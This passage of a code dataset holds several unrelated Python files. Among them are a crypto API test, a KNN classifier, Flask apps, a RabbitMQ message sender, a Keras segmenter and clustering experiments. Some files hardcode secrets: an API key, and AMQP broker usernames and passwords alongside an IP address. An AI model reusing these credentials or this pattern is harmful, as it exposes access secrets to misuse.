1].set_ylim(zoom)\naxes[-1].set_xlabel('Time (ms)')\nplt.subplots_adjust(hspace=0)\nplt.savefig('%s/%s-only-disc' % (savedir, saveas), dpi=200,\n bbox_inches='tight')\nplt.close()\n","sub_path":"ion-channel-models/compare-pp.py","file_name":"compare-pp.py","file_ext":"py","file_size_in_byte":8572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"23347940","text":"print(\"#Тестирование API\")\n\n\nfrom requests import Request, Session\nimport json\nfrom datetime import datetime \n\nurl = 'https://sandbox-api.coinmarketcap.com/v1/cryptocurrency/listings/latest' #песочница\n\nparameters = {\n 'start':'1',\n 'limit':'10',\n 'convert':'USD',\n 'sort_dir':\"desc\"\n}\nheaders = {\n 'Accepts': 'application/json',\n 'X-CMC_PRO_API_KEY': 'b54bcf4d-1bca-4e8e-9a24-22ff2c3d462c', #ключ для песочницы\n \n}\n\nsession = Session()\nsession.headers.update(headers)\n\ntry:\n response = 
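compare-pp.py above resamples the voltage protocol onto the data's time grid with `scipy.interpolate.interp1d`, and its 95% bands use `norm.ppf(1 - .05/2)` (about 1.96 standard deviations) around the posterior-predictive mean. A toy version of the resampling step, with made-up protocol values but the same call shape:

```python
import numpy as np
from scipy.interpolate import interp1d

protocol_times = np.array([0.0, 1.0, 2.0, 3.0])   # ms
protocol = np.array([-80.0, -80.0, 40.0, -80.0])  # mV (toy step protocol)
times = np.linspace(0.0, 3.0, 7)                  # the data's time grid

voltage = interp1d(protocol_times, protocol, kind='linear')(times)
print(voltage)  # protocol values linearly interpolated onto `times`
```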
session.get(url, params=parameters)\n json_data = json.loads(response.text)\n print(\"Запрос на url:\",response.url)\n\nexcept (ConnectionError, Timeout, TooManyRedirects) as e:\n print(e)\n\nprint(\"Код ответа:\", response.status_code)\nassert response.status_code == 200\n\nprint(\"Время ответа :\", response.elapsed.total_seconds()*1000, \"мс\")\nassert response.elapsed.total_seconds()*1000 <= 500, response.elapsed.total_seconds()*1000\n\nprint(\"Размер пакета данных:\", len(response.content),\"байт\")\nassert len(response.content) < 10*1024\n\n\nfor each in json_data['data']:\n print(\"Наименование валюты:\", each['name'])\n print(\"дата последнего обновления:\", each['last_updated'].split(\"T\")[0])\n\n\n\ntoday = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\nprint(\"Текущая дата:\",today)\n#assert today == each['last_updated'].split(\"T\")[0], each['last_updated'].split(\"T\")[0]\n\nprint(\"данные по запросу записаны в файл:file_response.text \")\nfile_data = open('file_response.text', 'wb')\nfile_data.write(response.content)\nfile_data.close()\n\n\nprint(\"Успешно\")\n","sub_path":"API_test1.py","file_name":"API_test1.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"598815927","text":"# coding:utf8\r\nimport sys\r\nimport numpy as np\r\nimport math\r\nimport operator\r\n\r\n\r\nK = 5 # you can choose another K value'''\r\n\r\ndef euclideanDistance(instance1, instance2, length):#计算两点之间的欧式距���\r\n distance=0\r\n for x in range(length):#这里的length是指实例有几项,对应于特征向量的维度\r\n distance += pow((instance1[x]-instance2[x]),2)\r\n return math.sqrt(distance)\r\n\r\ndef getNeighbors(trainingSet,testInstance,K):#获取离样本点最近的k个训练实例点\r\n neighbors = []#离样本点最近的k个训练实例点的列表\r\n distance=[]#由训练实例及其与样本点的欧氏距离组成的列表\r\n length=len(testInstance)-1#-1,因为测试集里面是有类标签的\r\n for x in range(len(trainingSet)):\r\n dist=euclideanDistance(testInstance,trainingSet[x],length)\r\n distance.append([trainingSet[x],dist])\r\n distance.sort(key=operator.itemgetter(1))\r\n for x in range(K):\r\n neighbors.append(distance[x][0])#存储的是前k个训练实例点的distance列表中的(trainingSet[x])\r\n return neighbors\r\n\r\ndef getResponse(neighbors):#获取k个训练实例点的最多的类\r\n neighborsLabel={}#字典中对应的键值对是类别及数量\r\n for x in range(len(neighbors)):\r\n response=neighbors[x][-1]#训练实例点的最后一个属性,即类标记\r\n if response in neighborsLabel:#遍历k个训练实例点的response,如果在字典中,就加1,不在的话更新这个值为1\r\n neighborsLabel[response]+=1\r\n else:\r\n neighborsLabel[response]=1\r\n sortedVotes=sorted(neighborsLabel.iteritems(),key=operator.itemgetter(1),reverse=True)#将字典以迭代器对象返回,并按类的数量进行降序排序\r\n return sortedVotes[0][0]#返回列表里第一项的类别\r\n\r\ndef getAccuracy(testSet,answer):#计算准确度\r\n correct=0#表示测试集中预测正确的个数\r\n for x in range(len(testSet)):\r\n if testSet[x][-1] == answer[x]:#如果预测的类标签与实际的类标签相同,则预测正确的个数加1\r\n correct += 1\r\n return (correct/float(len(testSet)))*100.0\r\n\r\ndef classify():\r\n # training\r\n trainingSet=[]\r\n with open('./training.txt') as f:\r\n for line in f:\r\n trainingSet.append(line.split(','))\r\n for x in range(len(trainingSet)):\r\n for y in range(4):\r\n trainingSet[x][y]= float(trainingSet[x][y])\r\n # you can add your core code here\r\n\r\n # test\r\n testSet=[]\r\n with open('./test.txt') as f:\r\n for line in f:\r\n testSet.append(line.split(','))\r\n for x in range(len(testSet)):\r\n for y in range(4):\r\n testSet[x][y] = float(testSet[x][y])\r\n # add your code here\r\n\r\n answer=[]\r\n for x in range(len(testSet)):\r\n neighbors=getNeighbors(trainingSet,testSet[x],K)\r\n 
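API_test1.py above catches `(ConnectionError, Timeout, TooManyRedirects)` without importing the latter two from `requests.exceptions`, so the handler itself would raise `NameError` the moment it fires. A corrected sketch of the fetch step (the helper name is hypothetical; the exception classes are the real ones from requests):

```python
import requests
from requests.exceptions import ConnectionError, Timeout, TooManyRedirects

def fetch_json(url, params, headers, timeout=5):
    """GET `url`, returning parsed JSON, or None on transport errors."""
    try:
        response = requests.get(url, params=params, headers=headers, timeout=timeout)
        response.raise_for_status()
        return response.json()
    except (ConnectionError, Timeout, TooManyRedirects) as exc:
        print("request failed:", exc)
        return None
```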
result=getResponse(neighbors)\r\n answer.append(result)\r\n print(repr(testSet[x])+'>predicted='+repr(result))\r\n accuracy=getAccuracy(testSet,answer)\r\n print ('Accuracy:'+repr(accuracy)+'%')\r\nif __name__ == '__main__':\r\n classify()\r\n","sub_path":"assignment 101/LuZhenni/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"460997487","text":"from flask import Flask, render_template, redirect, url_for, request, make_response\nfrom TheatreHopper import *\nfrom pprint import pprint\nfrom app import app\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef page():\n options = {}\n theatres, links = getTheatres()\n theatresLinks = [(theatres[i], links[i]) for i in xrange(len(theatres))]\n options[\"theatreList\"] = theatresLinks\n #print \"made it this far\"\n #raise IndexError\n #print request\n if request.form:\n # print request.form\n if \"theatre\" in request.form:\n url, soup = getShowtimesPage(request.form[\"theatre\"])\n dates, urls = getDates(soup, url)\n dateList = [(dates[i], urls[i]) for i in xrange(len(dates))]\n options[\"dates\"] = dateList\n if \"dates\" in request.form:\n #print request.form[\"dates\"]\n showtimes = getShowtimes(None, url=request.form[\"dates\"])\n #print showtimes\n hops = findHops(showtimes, int(request.form[\"maxWait\"]))\n #pprint(hops)\n marathons = findMovieMarathons(hops)\n removeDuplicates(marathons, [])\n options[\"marathons\"] = marathons\n #display(marathons, 0)\n #print request.form[\"dates\"] \n return make_response(render_template('index.html', **options))","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"566491368","text":"import pika\nfrom lsst.ctrl.iip.Consumer import Consumer\nfrom lsst.ctrl.iip.SimplePublisher import SimplePublisher\nimport sys\nimport os\nimport pprint\nimport copy\nimport time\nimport logging\nimport _thread\n\nclass Premium:\n def __init__(self):\n logging.basicConfig()\n #os.system('rabbitmqctl -p /tester purge_queue firehose')\n #os.system('rabbitmqctl -p /tester purge_queue ack_publish')\n self.sp2 = SimplePublisher('amqp://TEST1:TEST1@141.142.238.160:5672/%2Fbunny', \"YAML\")\n time.sleep(3)\n broker_url = 'amqp://BASE:BASE@141.142.238.160:5672/%2Fbunny'\n #broker_url = 'amqp://NCSA:NCSA@141.142.208.191:5672/%2Ftester'\n #broker_url = 'amqp://Fm:Fm@141.142.208.191:5672/%2Fbunny'\n #self._cons = FirehoseConsumer(broker_url, 'firehose', \"YAML\")\n self._cons = Consumer(broker_url, 'f1_consume', \"YAML\")\n #self._cons = Consumer(broker_url, 'pp_foreman_consume', \"YAML\")\n self._cons2 = Consumer(broker_url, 'ncsa_consume', \"YAML\")\n try:\n _thread.start_new_thread( self.do_it, (\"thread-1\", 2,) )\n except e:\n print(\"Cannot start thread\")\n print(e)\n \n try:\n _thread.start_new_thread( self.do_it2, (\"thread-2\", 2,) )\n except e:\n print(\"Cannot start thread\")\n print(e)\n \n def mycallback(self, ch, methon, properties, body):\n print(\" \")\n print(\"+++++++++++++=========++++++++++++++++\")\n print(\" f1_consume msg:\")\n print(body)\n\n\n def mycallback2(self, ch, methon, properties, body):\n print(\" \")\n print(\">>>>>>>>>>>>>>><<<<<<<<<<<<<<<<\")\n print(\" f2_consume msg:\")\n print (body)\n if body['MSG_TYPE'] == 'NEXT_VISIT':\n return\n msg = {}\n msg['ACK_ID'] = body['ACK_ID']\n msg['MSG_TYPE'] = 'NCSA_START_INTEGRATION_ACK'\n 
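knn.py above hand-rolls the classifier: Euclidean distance, K nearest neighbours, majority vote (its `getResponse` still uses Python 2's `dict.iteritems`). For comparison, the equivalent with scikit-learn on the same iris-style data, assuming scikit-learn is installed:

```python
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier

X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)

clf = KNeighborsClassifier(n_neighbors=5)  # K = 5, as in the script
clf.fit(X_train, y_train)
print("Accuracy: {:.1%}".format(clf.score(X_test, y_test)))
```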
msg['COMPONENT_NAME'] = 'NCSA_FOREMAN'\n fwdrs = copy.deepcopy(body['FORWARDERS'])\n pp = pprint.PrettyPrinter(indent=2)\n print(\"In callback2, fwdrs dict is:\")\n pp.pprint(fwdrs)\n fwdrs_keys = list(fwdrs.keys())\n i = 1\n for fwdr in fwdrs_keys:\n dists = {}\n dists['FQN'] = \"Distributor_\" + str(i)\n dists['NAME'] = \"D\" + str(i)\n dists['HOSTNAME'] = \"D\" + str(i)\n dists['TARGET_DIR'] = \"/dev/null\"\n dists['IP_ADDR'] = \"141.142.237.16\" + str(i)\n fwdrs[fwdr]['DISTRIBUTOR'] = dists\n i = i + 1\n\n #for fwdr in fwdrs_keys:\n # dists = {}\n # dists[fwdr] = {}\n # dists[fwdr]['FQN'] = \"Distributor_\" + str(i)\n # dists[fwdr]['NAME'] = \"D\" + str(i)\n # dists[fwdr]['HOSTNAME'] = \"D\" + str(i)\n # dists[fwdr]['TARGET_DIR'] = \"/dev/null\"\n # dists[fwdr]['IP_ADDR'] = \"141.142.237.16\" + str(i)\n # fwdrs[fwdr]['DISTRIBUTOR'] = dists\n # i = i + 1\n\n msg['PAIRS'] = fwdrs\n msg['ACK_BOOL'] = True\n msg['JOB_NUM'] = body['JOB_NUM']\n msg['IMAGE_ID'] = body['IMAGE_ID']\n msg['VISIT_ID'] = body['VISIT_ID']\n msg['SESSION_ID'] = body['SESSION_ID']\n self.sp2.publish_message(\"pp_foreman_ack_publish\", msg)\n\n\n def do_it(self, threadname, delay):\n print(\"Before run call\")\n self._cons.run(self.mycallback)\n\n def do_it2(self, threadname, delay):\n print(\"Before run call\")\n self._cons2.run(self.mycallback2)\n\n \n\ndef main():\n premium = Premium()\n sp1 = SimplePublisher('amqp://BASE_PUB:BASE_PUB@141.142.238.160:5672/%2Fbunny', \"YAML\")\n #sp2 = SimplePublisher('amqp://TesT:TesT@141.142.208.191:5672/%2Ftester')\n #broker_url = 'amqp://Fm:Fm@141.142.208.191:5672/%2Fbunny'\n #cons = Consumer(broker_url, 'F8_consume')\n #try:\n # thread.start_new_thread( do_it, (\"thread-1\", 2,) )\n #except:\n # print \"Cannot start thread\"\n\n\n # while 1:\n# msg = {}\n# msg['MSG_TYPE'] = 'NEW_ARCHIVE_ITEM'\n# msg['SESSION_ID'] = \"Tues_xx417\"\n# msg['VISIT_ID'] = \"V_5512\"\n# msg['IMAGE_TYPE'] = 'AR'\n# msg['IMAGE_ID'] = \"IMG_442\"\n# msg['ACK_ID'] = \"NEW_ITEM_ACK_14\"\n# time.sleep(3)\n# sp1.publish_message(\"archive_ctrl_consume\", msg)\n\n #msg = {}\n #msg['MSG_TYPE'] = \"DISABLE\"\n #msg['DEVICE'] = 'AR'\n #time.sleep(5)\n #sp1.publish_message(\"ocs_dmcs_consume\", msg)\n\n #msg = {}\n #msg['MSG_TYPE'] = 'AR_ITEMS_XFERD'\n #msg['IMAGE_ID'] = \"IMG_442\"\n #msg['CCD_LIST'] = {'4':{ 'FILENAME':'/mnt/xfer_dir/101_100_4.fits','CHECKSUM':'348e1dbe4956e9d8d2dfa97535744561'}}\n #msg['ACK_ID'] = 'AR_ITEMS_ACK_2241'\n #time.sleep(5)\n #sp1.publish_message(\"archive_ctrl_consume\", msg)\n\n \n msg = {}\n msg['MSG_TYPE'] = \"NEW_SESSION\"\n msg['SESSION_ID'] = 'session_RZ_22'\n msg['RESPONSE_QUEUE'] = 'dmcs_consume'\n msg['ACK_ID'] = 'NEW_SESSION_ACK_14'\n time.sleep(4)\n sp1.publish_message(\"pp_foreman_consume\", msg)\n\n msg = {}\n msg['MSG_TYPE'] = \"NEXT_VISIT\"\n msg['SESSION_ID'] = 'session_RZ_22'\n msg['VISIT_ID'] = 'XX_28272'\n msg['BORE_SIGHT'] = 'A LITTLE TO THE LEFT'\n msg['RESPONSE_QUEUE'] = 'dmcs_consume'\n msg['ACK_ID'] = 'NEXT_VISIT_ACK_15'\n time.sleep(4)\n sp1.publish_message(\"pp_foreman_consume\", msg)\n\n ccd_list = [1,2,12,17,9,22,43,44,46,47,55,71,15,78,79,82,84,85]\n msg = {}\n msg['MSG_TYPE'] = \"START_INTEGRATION\"\n msg['JOB_NUM'] = '121163'\n msg['IMAGE_ID'] = 'IMG_444244'\n msg['VISIT_ID'] = 'VV1X004'\n msg['SESSION_ID'] = 'session_RZ_22'\n msg['CCD_LIST'] = ccd_list\n \n msg['RESPONSE_QUEUE'] = 'dmcs_ack_consume'\n msg['ACK_ID'] = 'S_I_ACK_16'\n time.sleep(4)\n sp1.publish_message(\"pp_foreman_consume\", msg)\n time.sleep(7)\n\n #msg = {}\n #msg['MSG_TYPE'] = 
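Both threaded consumers above are started with `_thread.start_new_thread` inside `except e:` blocks; `e` is unbound there, so a startup failure would raise `NameError` instead of being reported. A safer sketch with the higher-level `threading` module (standard library only; the helper name is hypothetical):

```python
import threading

def start_consumer(target, name):
    """Run a consumer callback on a daemon thread, reporting failures."""
    try:
        worker = threading.Thread(target=target, name=name, daemon=True)
        worker.start()
        return worker
    except RuntimeError as e:  # raised when a new thread cannot be started
        print("Cannot start thread:", e)
        return None
```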
\"READOUT\"\n #msg['IMAGE_ID'] = 'IMG_444244'\n #msg['DEVICE'] = 'AR'\n #time.sleep(4)\n #sp1.publish_message(\"ocs_dmcs_consume\", msg)\n \n\n print(\"Sender done\")\n\n\n #sp2.publish_message(\"ack_publish\", \"No, It's COLD\")\n #time.sleep(2)\n #pass\n\n\n\nif __name__ == \"__main__\": main()\n","sub_path":"test_scripts/pp_sender.py","file_name":"pp_sender.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"1926380","text":"import skimage.io as io\nfrom . import unet\nimport numpy as np\nimport os\nimport cv2\nfrom PIL import Image\nclass Predictor:\n def __init__(self): \n self.category = None\n self.size = None\n self.channel = None\n self.weight_path = \"SamTech/Vision/Segmenter/source/\"\n self.weight_name = None\n self.__model = None\n self.model_name = None\n\n def init_model(self, model_name, weight_path, summary = 0):\n self.__model, self.model_name = getattr(unet, model_name)(input_size = (self.size[0],self.size[1],self.channel), verbose = summary, pretrained_weights = weight_path)\n\n def summary(self):\n print ('\\nModel | {}'.format(self.model_name))\n print ('Category | {}'.format(self.category))\n print ('Weight | {}'.format(self.weight_name))\n print ('Size | {}'.format(self.size))\n print ('Color Channels | {}'.format(self.channel))\n print ('Weight Path | {}\\n'.format(self.weight_paht))\n\n def load_model(self, weight):\n path = self.weight_path + weight\n self.weight_name = weight\n weight = weight.split('-') \n self.model_name = weight[0].split('_')[0]\n self.category = weight[0].split('_')[1]\n self.size = (int(weight[1]), int(weight[2]))\n self.channel = int(weight[3])\n self.init_model(self.model_name, path)\n\n def predict(self, input_image_path, save_path = None):\n img = cv2.imread(input_image_path,0)\n img = cv2.resize(img,self.size)\n img = np.reshape(img,img.shape+(1,)) \n img = np.reshape(img,(1,)+img.shape)\n result = self.__model.predict(img)\n np_out = result[0][:,:,0]\n if save_path:\n io.imsave(save_path, np_out)\n return 1\n return np_out\n \n def segment(self, input_image_path, save_path = None):\n np_out = self.predict(input_image_path)\n img_bgr = cv2.imread(input_image_path, 1)\n img_bgr = cv2.resize(img_bgr, self.size)\n\n np_out = cv2.cvtColor(np_out,cv2.COLOR_GRAY2BGR)\n np_out = cv2.normalize(np_out, np_out, 0, 255, cv2.NORM_MINMAX).astype('uint8')\n np_out = Image.fromarray(np_out)\n\n mask_array = np.array(np_out) \n mask_array = mask_array[:, :, ::-1].copy() \n mask_out = cv2.bitwise_and(img_bgr, mask_array)\n\n if save_path:\n cv2.imwrite(save_path, mask_out)\n return 1\n return mask_out\n\nif __name__ == '__main__':\n pass","sub_path":"SamTech/Vision/Segmenter/keras_predictor.py","file_name":"keras_predictor.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"386276547","text":"from flask import Flask, render_template\nfrom blueprints.greeting import greeting_blueprint\nfrom blueprints.pie import pie_blueprint\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home(): \n return render_template('index.html')\n\napp.register_blueprint(greeting_blueprint)\napp.register_blueprint(pie_blueprint)\n\nif __name__ == '__main__': \n app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"220029787","text":"name = 
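The Flask app above mounts its routes from two blueprint modules that are not shown. A sketch of what such a module might contain — the route and handler here are hypothetical stand-ins for the real `blueprints/greeting.py`:

```python
from flask import Blueprint

# Hypothetical contents of blueprints/greeting.py
greeting_blueprint = Blueprint('greeting', __name__)

@greeting_blueprint.route('/greeting/<name>')
def greeting(name):
    return 'Hello, {}!'.format(name)
```

Registering the blueprint with `app.register_blueprint(greeting_blueprint)`, as the app does, attaches every route defined on it to the main application.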
\"Smith\" # input(\"Enter employee's name: \")\nhours = 10 # eval(input(\"Enter number of hours worked in a week: \"))\npayRate = 9.75 # eval(input(\"Enter hourly pay rate: \"))\ntaxFederal = 0.20 # eval(input(\"Enter federal tax withholding rate: \"))\ntaxState = 0.09 # eval(input(\"Enter state tax withholding rate: \"))\n\npayGross = hours * payRate\npayNet = payGross * (1 - (taxFederal + taxState))\n\nout = \"Employee Name: \" + name + \"\\n\"\nout += \"Hours worked: \" + format(hours, \".1f\") + \"\\n\"\nout += \"Pay Rate: \" + format(payRate, \".2f\") + \"\\n\"\nout += \"Gross Pay: \" + format(payGross, \".1f\") + \"\\n\"\nout += \"Deductions: \" + \"\\n\"\nout += \" Federal Withholding (\" + format(taxFederal, \".1%\") + \"): $\" + format(payGross * taxFederal, \".2f\") + \"\\n\"\nout += \" State Withholding (\" + format(taxState, \".1%\") + \"): $\" + format(payGross * taxState, \".2f\") + \"\\n\"\nout += \" Total Deduction: $\" + format(payGross * (taxState + taxFederal), \".2f\") + \"\\n\"\nout += \"Net Pay: $\" + format(payNet, \".2f\")\n\nprint(out)\n","sub_path":"KAU_CPIT110/Lab5/Problem 2.py","file_name":"Problem 2.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"262200235","text":"from tkinter import *\n\n\ndef convert_to_measurements():\n clear_text()\n\n try:\n grams = float(kg_value.get()) * 1000\n pounds = float(kg_value.get()) * 2.20462\n ounces = float(kg_value.get()) * 35.274\n\n gram_text.insert(END, grams)\n pounds_text.insert(END, pounds)\n ounces_text.insert(END, ounces)\n except ValueError:\n gram_text.insert(END, \"NaN\")\n pounds_text.insert(END, \"NaN\")\n ounces_text.insert(END, \"NaN\")\n\n\ndef clear_text():\n gram_text.delete(1.0, END)\n pounds_text.delete(1.0, END)\n ounces_text.delete(1.0, END)\n\n\nwindow = Tk()\n\nkg_label = Label(window, text=\"Kg\")\nkg_label.grid(row=0, column=0)\n\nkg_value = StringVar()\nkg_input = Entry(window, textvariable=kg_value)\nkg_input.grid(row=0, column=1)\n\nconvert_button = Button(window, text=\"Convert\", command=convert_to_measurements)\nconvert_button.grid(row=0, column=2)\n\ngram_text = Text(window, height=1, width=20)\ngram_text.grid(row=1, column=0)\n\npounds_text = Text(window, height=1, width=20)\npounds_text.grid(row=1, column=1)\n\nounces_text = Text(window, height=1, width=20)\nounces_text.grid(row=1, column=2)\n\nwindow.mainloop()\n","sub_path":"PMC/Section14/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"633560110","text":"from unittest import TestCase\nfrom mockito import *\n\nfrom src.Fastq import *\nfrom src.SeqAdn import *\n\n__author__ = 'eps'\n\n\nclass TestFastq(TestCase):\n \"\"\"\n Esta clase de test representa los test para la clase Fastq\n \"\"\"\n def test_get_average_qual(self):\n \"\"\"\n Esta clase representa un claculo medio de todas las secuencias...\n\n\n \"\"\"\n seq_1 = mock(SeqAdn)\n seq_2 = mock(SeqAdn)\n\n when(seq_1).av_qual().thenReturn(10)\n when(seq_2).av_qual().thenReturn(15)\n\n fastq = Fastq('roche')\n fastq.add_sequences(seq_1)\n fastq.add_sequences(seq_2)\n\n self.assertEquals(fastq.get_average_qual(),12.5)\n","sub_path":"test/test_fastq.py","file_name":"test_fastq.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122279317","text":"import numpy as 
np\nimport time\nimport yaml\nimport sys\nimport logging\nimport pandas as pd\nsys.path.append('../../../../Code/')\nfrom plot_grid import load_h5, data\nfrom kmeans_hops import getConstraints, normalize, doMutualInformation, getCollisions\nfrom rfml.core import Experiment\nfrom sklearn.cluster import k_means, KMeans, SpectralClustering, AgglomerativeClustering, DBSCAN\nfrom sklearn.metrics import silhouette_score\nfrom statistics import mode\nfrom collections import Counter\n\n\ndbg = True\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger()\nlogger.handlers = []\nch = logging.StreamHandler()\nfmt = logging.Formatter(\"%(thread)d %(levelname)s --\"\n \"%(filename)s (line %(lineno)s):%(funcName)s: \"\n \"%(message)s\")\nch.setFormatter(fmt)\nch.setLevel(logging.DEBUG if dbg else logging.INFO)\nlogger.addHandler(ch)\n\nn_runs = 1 \nmax_iter = 50\n\n\ndef reassignClusterLabels(keylabels,guesslabels):\n guesslabels=np.asarray(guesslabels)\n originalGuessLabels=np.copy(guesslabels)\n numberOfClusters=max(keylabels)+1\n if numberOfClusters != len(set(keylabels)):\n return False\n for clusterNumber in range(numberOfClusters):\n locations = np.where(np.asarray(keylabels)==clusterNumber)\n guessMajority = max(set(list(originalGuessLabels[locations])), key=list(originalGuessLabels[locations]).count) \n guesslabels[np.where(np.asarray(originalGuessLabels)==guessMajority)[0]]=clusterNumber\n return list(guesslabels)\n\ndef getClusterAccuracy(keylabels,guesslabels):\n if not guesslabels:\n return None\n correct = (np.asarray(keylabels)==np.asarray(guesslabels))\n accuracy = correct.sum()/correct.size\n return accuracy\n\ndef getCollisionAccuracy(keylabels,guesslabels,collisions):\n if not guesslabels:\n return None\n if not collisions:\n return None\n guesslabels = reassignClusterLabels(keylabels,guesslabels)\n logger.debug(\"collisions {}\".format(collisions))\n flatList=[item for sublist in collisions for item in sublist]\n logger.debug(\"flatlist {}\".format(flatList))\n uniqueElements=set(flatList)\n tally=[]\n collisionAccuracy=0\n for elem in uniqueElements:\n if (keylabels[elem] == guesslabels[elem]):\n tally+=[1]\n else:\n tally+=[0]\n collisionAccuracy=sum(tally)/len(tally)\n return collisionAccuracy\n\ndef getSilhouetteCoeff(data,labels):\n silCoeff=silhouette_score(data,labels,metric='euclidean')\n return silCoeff\n\n\ndef getMinClusters(hops,params):\n endind = params.index(\"endtime\")\n startind = params.index(\"starttime\")\n numHops = hops.shape[0]\n overlaps=[]\n for hopidx,hop in enumerate(hops):\n start=hop[startind]\n end=hop[endind]\n #print(np.equal(np.delete(hops,hopidx,0)[:,startind]start))\n\n overlaps.append(np.sum(np.equal(np.delete(hops,hopidx,0)[:,startind]start)))\n return np.max(overlaps)+1\n\nclass MonteCarlo(Experiment):\n\n def __init__(self, config, dbg):\n super(MonteCarlo, self).__init__('MonteCarlo', config, dbg)\n with open('param_config.yml','r') as stream:\n self.param_dict = (yaml.load(stream))\n\n\n def run(self, trials, errors,runnum):\n numWritesToFile=0\n ktorun=[3,4,5,6,7,8]\n for kclusters in ktorun:\n for t in trials:\n for e in errors:\n logger.info(\"================= On Trial {} and Error {} ==============\".format(t,e))\n max_endtime = self.param_dict['grid']['duration'][2]\n hops, key, oparams = load_h5('../../../../Code/TimeHops/ZeroError' + str(kclusters)+'Hops.h5',['pulseshape'], t, e) \n logger.debug(\"key {}\".format(key))\n\n #PercentConstraintsDropped=[0,.25,.50,.75,.99]\n PercentConstraintsDropped=[0]\n for 
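`getSilhouetteCoeff` above is a thin wrapper over `sklearn.metrics.silhouette_score`, where values near 1 indicate tight, well-separated clusters and values near 0 indicate overlapping ones. A self-contained check on two synthetic Gaussian blobs (toy data, not the hop dataset used by the experiment):

```python
import numpy as np
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score

rng = np.random.default_rng(0)
X = np.vstack([rng.normal(0.0, 0.3, (50, 2)),
               rng.normal(3.0, 0.3, (50, 2))])

labels = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(X)
print(round(silhouette_score(X, labels, metric='euclidean'), 2))  # ~0.9 for well-separated blobs
```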
ConstraintsDropped in PercentConstraintsDropped:\n heldoutTrainPoints=[.5]\n for heldout in heldoutTrainPoints:\n train_hops = np.copy(hops)\n train_keys = np.copy(key)\n params = np.copy(oparams)\n print(max_endtime*.5)\n\n #hop indices that will be held out for testing\n test_hop_idx = np.where(np.asfarray(hops[:,np.where(params == 'starttime')[0]]) >(max_endtime*(heldout)))[0]\n test_hop_last50_idx = np.where(np.asfarray(hops[:,np.where(params == 'starttime')[0]]) >(max_endtime*(.5)))[0]\n logger.debug('held out test hops {}'.format(test_hop_idx))\n\n test_hops = hops[test_hop_last50_idx]\n test_keys = [key[indx] for indx in test_hop_last50_idx]\n\n test_hops = test_hops.astype(np.float)\n train_hops = train_hops.astype(np.float)\n\n train_hops=np.delete(train_hops,test_hop_idx,axis=0)\n train_keys=np.delete(train_keys,test_hop_idx)\n\n if (len(set(train_keys)) \"+ inpNameBase[:-3] + \"log \\n\")\n \n slurmFile.close()\n \n# lastXyz = self.xyz[-1]\n xyzFile = open(xyzName, 'w')\n xyzFile.write(str(len(self.elements))+\"\\n\\n\")\n \n for el, coord in zip(self.elements, self.xyz[-1]):\n xyzFile.write(el+\" \"+\" \".join([ str(c) for c in coord ])+\"\\n\")\n xyzFile.close()\n","sub_path":"terachemParser.py","file_name":"terachemParser.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"5725220","text":"import numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.datasets import load_iris\nfrom sklearn.externals import joblib\n\niris = load_iris()\n\nX = iris.data\ny = iris.target\n\nidxs = np.random.permutation(len(X))\n\nX_train = X[idxs[:-10]]\ny_train = y[idxs[:-10]]\n\nX_test = X[idxs[-10:]]\ny_test = y[idxs[-10:]]\n\nclf = KNeighborsClassifier()\nclf.fit(X_train, y_train)\n\njoblib.dump(clf, 'model.pkl')","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"527645413","text":"import json\nfrom rank_bm25 import BM25Okapi\nfrom nltk.stem import PorterStemmer\n\ndef getRelevantCourses(school, interests):\n courses = getCourses(school)\n textArr = []\n for course in courses:\n text = course['title'] + '. 
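train_model.py above persists the fitted classifier with `sklearn.externals.joblib`, an alias that was removed in recent scikit-learn releases — the standalone `joblib` package is the current import. The matching load side, assuming the `model.pkl` the script writes (the sample vector is an illustrative iris measurement):

```python
import joblib  # `from sklearn.externals import joblib` no longer exists in modern scikit-learn
import numpy as np

clf = joblib.load('model.pkl')
sample = np.array([[5.1, 3.5, 1.4, 0.2]])  # one iris measurement, in cm
print(clf.predict(sample))                 # e.g. [0] -> setosa
```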
